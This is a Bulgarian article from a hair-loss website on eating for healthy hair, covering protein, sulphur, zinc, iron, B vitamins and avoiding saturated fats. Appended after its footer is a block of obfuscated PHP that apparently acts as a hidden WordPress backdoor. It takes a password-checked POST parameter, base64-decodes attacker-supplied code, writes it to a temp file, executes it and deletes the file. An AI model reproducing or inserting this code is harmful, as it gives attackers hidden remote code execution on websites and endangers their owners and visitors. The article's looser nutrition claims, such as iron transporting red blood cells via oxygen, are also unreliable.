Как да подхраним косата правилно | Косопад

Как да подхраним косата правилно

kosopad-chetka

Здравето на косата ни зависи до голяма степен от начина на хранене. Но какво е полезно да ядем? Кои са задължителните храни, за да имаме здрава коса?

Подходящата диета за косата означава да изключим наситените мазнини и да включим достатъчно протеини, сяра, цинк, желязо и витамини от В групата. Протеините, сярата и цинка са необходими за синтеза на кератин. Желязото помага за подхранването на корените, а витамин В помага за обновяването на клетките. Едни от най- ценните храни са яйцата и лещата. Двете съдържат значимо количество от петте елемента.

Без наситените мазнини

Наситените мазнини водят до образуването на токсини, които се натрупват под скалпа и влияят върху кръвообращението към корените, производството на пърхот и сърбежите. За да избегнем тези неприятни усещания, трябва да приемаме по- малко колбаси, бърза храна, сладко, бяло брашно и пр.

proteini-za-otslabvane

Ролята на протеините

Протеините са важни за косата, тъй като помагат за производството на кератин, т.е., образуването на клетките на косата. Съдържат серни аминокиселини. Желателният прием на протеини е 75 грама. Съдържат се в храните от животински произход. Косопадът е често срещан при вегетарианците.

Храни с високо съдържание на сяра и цинк

Сред тях са жълтък, леща и пълнозърнести храни.

Ролята на желязото

Помага за преноса на червените кръвни телца чрез кислорода. Този минерал е жизненоважен за косата.

Витамин В

Стимулират обновяването на клетките, в това число и на космените фоликули.

22. октомври 2015 21:57:07 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}